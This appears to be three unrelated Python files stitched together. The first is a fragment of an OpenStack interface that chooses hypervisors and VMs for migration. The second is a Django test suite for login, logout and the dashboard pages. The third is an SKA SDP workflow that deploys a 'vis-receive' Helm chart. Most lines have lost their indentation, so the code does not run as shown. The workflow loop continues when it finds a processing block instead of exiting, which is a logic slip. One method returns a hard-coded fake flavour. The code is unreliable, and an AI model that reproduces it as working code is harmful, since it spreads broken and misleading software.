LOGGER.info("Looking for a host to move vm {} to...".format(vm_id))
hypervisor_list = self._nova_client.hypervisors.list()
valid_hypervisors = []
for hypervisor in hypervisor_list:
hypervisor_hosts = self._nova_client.hypervisors.search(
hypervisor.hypervisor_hostname,
servers=True
)
origin_hypervisor = False
for hypervisor_host in hypervisor_hosts:
try:
for server in hypervisor_host.servers:
if server.get('uuid', None) == vm_id:
origin_hypervisor = True
except AttributeError:
LOGGER.warn("No servers on this hypervisor")
if not origin_hypervisor:
valid_hypervisors.append(hypervisor)
if valid_hypervisors:
LOGGER.info(
"Found these hypervisors {}".format(valid_hypervisors)
)
rando_hype = random.choice(valid_hypervisors)
LOGGER.info(
"Returning this hypervisor [{}]".format(rando_hype)
)
return rando_hype.hypervisor_hostname
else:
LOGGER.warn("Could not find any other hypervisors")
return None
def get_migration_target(self, stack_id):
"""get a vm id from this stack"""
keystone_client = OpenStackClients.get_keystone_client()
heat_client = OpenStackClients.get_heat_client_for_stack(
keystone_client,
stack_id
)
LOGGER.info(
"Looking for a vm that belongs to stack {}".format(stack_id)
)
the_vms = []
for resource in heat_client.resources.list(stack_id):
if resource.resource_type == "OS::Nova::Server":
the_vms.append(resource.physical_resource_id)
LOGGER.info("Found these vms {}".format(the_vms))
rando_vm = random.choice(the_vms)
LOGGER.info("Returning this vm [{}]".format(rando_vm))
return rando_vm
def get_scale_value(self, vm_id):
"""TODO: get the flavour 'up' from this vm's current one"""
# TODO: actually get scale value
tmp_flavour = "2"
LOGGER.warn(
"Returning fake flavour {} for VM uuid {}".format(
tmp_flavour, vm_id
)
)
return tmp_flavour
def get_vm_hypervisor_mapping(self):
server_list = {}
hypvrs = self._nova_client.hypervisors.list()
for hype in hypvrs:
hype_obj = self._nova_client.hypervisors.search(
hype.hypervisor_hostname,
servers=True
)
for h in hype_obj:
try:
for server in h.servers:
server_list[server.get('uuid', None)] = h.hypervisor_hostname
except AttributeError:
pass
return server_list
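# Minimal usage sketch (illustration only): it assumes a reachable OpenStack
# deployment and that the configuration module above holds valid credentials.
if __name__ == "__main__":
    interface = OpenStackInterface()
    mapping = interface.get_vm_hypervisor_mapping()
    for vm_uuid, hypervisor_name in mapping.items():
        LOGGER.info("vm %s runs on hypervisor %s", vm_uuid, hypervisor_name)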
|
python
|
from django.contrib.auth import authenticate
from django.test import TestCase
from django.urls import resolve
from .models import User
from .views import index_view, dashboard_view
from django.contrib.auth.views import LoginView, LogoutView
from django.contrib.auth.decorators import login_required
class UserLoggedInTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
username="testuser", password="test.pass"
)
self.user.save()
def tearDown(self):
self.user.delete()
def test_correct(self):
user = authenticate(username="testuser", password="test.pass")
self.assertTrue((user is not None) and user.is_authenticated)
def test_wrong_username(self):
user = authenticate(username="user", password="test.pass")
self.assertFalse((user is not None) and user.is_authenticated)
def test_wrong_password(self):
user = authenticate(username="testuser", password="pass")
self.assertFalse((user is not None) and user.is_authenticated)
def test_user_permission(self):
self.assertFalse(self.user.is_superuser)
self.assertTrue(self.user.is_active)
self.assertFalse(self.user.is_staff)
class AdminLoggedInTest(TestCase):
def setUp(self):
self.admin = User.objects.create_superuser(
username="admin", password="admin.pass"
)
self.admin.save()
    def tearDown(self):
self.admin.delete()
def test_correct(self):
admin = authenticate(username="admin", password="admin.pass")
self.assertTrue((admin is not None) and admin.is_authenticated)
def test_wrong_username(self):
admin = authenticate(username="user", password="admin.pass")
self.assertFalse((admin is not None) and admin.is_authenticated)
def test_wrong_password(self):
admin = authenticate(username="admin", password="pass")
self.assertFalse((admin is not None) and admin.is_authenticated)
def test_superuser_permission(self):
self.assertTrue(self.admin.is_active)
self.assertTrue(self.admin.is_staff)
self.assertTrue(self.admin.is_superuser)
class DashboardPageTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
username="testuser", password="test.pass"
)
self.response = self.client.login(
username="testuser", password="test.pass"
)
    def test_user_logged_in(self):
        # login_required is a view decorator; in a test we just check the login state
        self.assertTrue(self.response)
        self.assertTrue(self.user.is_authenticated)
def test_root_url(self):
response = self.client.get("/")
self.assertEqual(response.status_code, 200)
def test_root_url_view(self):
dashboard_url = resolve("/")
self.assertEqual(dashboard_url.func, index_view)
def test_root_title(self):
response = self.client.get("/")
self.assertContains(response, "<title>TDrive</title>")
def test_root_template(self):
response = self.client.get("/")
self.assertTemplateUsed(response, "registration/index.html")
class LoginPageTest(TestCase):
def test_login_url(self):
response = self.client.get("/login/")
self.assertEqual(response.status_code, 200)
def test_login_title(self):
response = self.client.get("/login/")
self.assertContains(response, "<title>Login | TDrive</title>")
def test_login_template(self):
response = self.client.get("/login/")
self.assertTemplateUsed(response, "registration/login.html")
class UserLoggedOutTest(TestCase):
def setUp(self):
self.user = User.objects.create_user(
username="testuser", password="test.pass"
)
self.response = self.client.login(
username="testuser", password="test.pass"
)
def test_logout_url(self):
response = self.client.get("/logout/?next=/")
self.assertEqual(response['Location'], '/')
self.assertEqual(response.status_code, 302)
|
python
|
"""
Example Vis Receive workflow
"""
# pylint: disable=C0103
import logging
import ska_sdp_config
import os
# Initialise logging and configuration
logging.basicConfig()
log = logging.getLogger('main')
log.setLevel(logging.INFO)
config = ska_sdp_config.Config()
# Find processing block configuration from the configuration.
workflow = {
'id': 'vis_receive',
'version': '0.1.0',
'type': 'realtime'
}
log.info("Waiting for processing block...")
for txn in config.txn():
pb = txn.take_processing_block_by_workflow(
workflow, config.client_lease)
if pb is not None:
continue
txn.loop(wait=True)
# Show which processing block we claimed
log.info("Claimed processing block %s", pb)
# Deploy Vis Receive with 1 worker.
log.info("Deploying Vis Receive...")
deploy_id = pb.pb_id + "-vis-receive"
deploy = ska_sdp_config.Deployment(
deploy_id, "helm", {
'chart': 'vis-receive', # Helm chart deploy/charts/vis-receive
})
for txn in config.txn():
txn.create_deployment(deploy)
try:
# Just idle until processing block or we lose ownership
log.info("Done, now idling...")
for txn in config.txn():
if not txn.is_processing_block_owner(pb.pb_id):
break
txn.loop(True)
finally:
# Clean up vis receive deployment.
for txn in config.txn():
txn.delete_deployment(deploy)
config.close()
|